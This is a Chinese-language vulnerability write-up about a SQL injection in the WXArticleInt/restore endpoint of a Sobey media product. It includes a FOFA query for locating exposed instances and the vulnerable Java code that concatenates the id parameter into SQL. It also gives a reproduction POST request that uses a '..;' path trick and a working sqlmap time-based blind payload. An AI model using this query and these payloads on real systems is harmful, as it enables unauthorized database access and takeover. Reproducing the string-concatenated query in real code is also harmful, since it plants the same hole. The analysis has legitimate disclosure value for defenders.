漏洞简介
索贝产品中的 /sobey-mchEditor/mch/WXArticleInt/restore 接口存在SQL注入漏洞,攻击者可以通过构造恶意的SQL语句,获取数据库中的敏感信息,甚至可能导致数据库被完全控制。
影响版本
fofa语法
icon_hash="689611853"||app="SOBEY-融媒体" || body="You need to enable JavaScript to run this app" && header="Sobey"
漏洞分析
根据漏洞信息看下mch/WXArticleInt/restore的实现逻辑
@RequestMapping(
value = {"/restore"},
method = {RequestMethod.POST}
)
public Response restore(@RequestParam("token") String token, @RequestParam("siteCode") String siteCode, @RequestParam("id") String id) {
Response response = new Response();
response.setStatus(200);
JSONObject userinfo = (JSONObject)this.req.getAttribute("userinfo");
try {
QueryBuilder qb = new QueryBuilder("update zcnwxarticle SET ifval='1' where id in (" + id + ")");
qb.executeNoQuery();
代码一看就很明了了,id是被直接拼接在in子语句中,从而造成了SQL注入漏洞。
漏洞复现
POST /sobey-mchEditor/js/..;/mch/WXArticleInt/restore HTTP/1.1
Host: sobey.mrxn.net
Content-Type: application/x-www-form-urlencoded
siteCode=&id=SQLI_POC&token=

成功延时 5 秒
sqlmap结果如下
---
Parameter: #1* ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: siteCode=&id=1 AND (SELECT 2804 FROM (SELECT(SLEEP(5)))MDfc)&token=
--- 

